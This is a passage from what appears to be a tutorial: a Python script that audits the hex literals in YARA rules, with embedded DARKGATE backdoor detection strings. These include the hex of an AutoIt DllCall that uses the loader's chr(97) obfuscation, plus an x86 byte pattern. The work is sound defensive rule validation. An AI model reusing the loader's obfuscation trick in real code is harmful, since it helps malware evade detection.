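            report[name] = "ok: odd digit count (substring of a longer blob), not decoded"
        else:
            text = decode_hex_literal(compact)
            report[name] = "ok: " + (text if text is not None else "binary")
    return report


# $str6 of M_Backdoor_DARKGATE_1, joined onto one line as it must be in a real rule file
STR6 = ("446C6C43616C6C28227573657233322E646C6C222C20226C726573756C74222C2022"
        "4322266368722839372926226C6C57696E646F7750726F63222C2022707472222C2044"
        "6C6C5374727563744765745074722824")

# Constructed excerpt: a text marker, the AutoIt literal above, the x86 code literal
# from M_Backdoor_DARKGATE_2, and a literal deliberately corrupted with a stray character.
RULE_EXCERPT = r'''
rule example_hex_audit
{
    strings:
        $marker = "BINARYTOSTRING ( \"0x\" &"
        $autoit = "''' + STR6 + r'''"
        $x86    = "00C680A438000045C680A538000000C680A638000049C680A738000000C680A83800004EC680A938000000C680AA38000046"
        $bad    = "446C6C43616C6C2822757365Ω233322E646C6C22"
    condition:
        all of them
}
'''

if __name__ == "__main__":
    for name, status in audit_hex_literals(RULE_EXCERPT).items():
        print(f"{name}: {status}")
```

Running it shows that $autoit is the hex encoding of an AutoIt DllCall against user32.dll (the "C"&chr(97)&"llWindowProc" concatenation is the loader's own string obfuscation), that $x86 is code rather than text, and that $bad would never fire; the same audit can be pointed at any rule file before it is deployed.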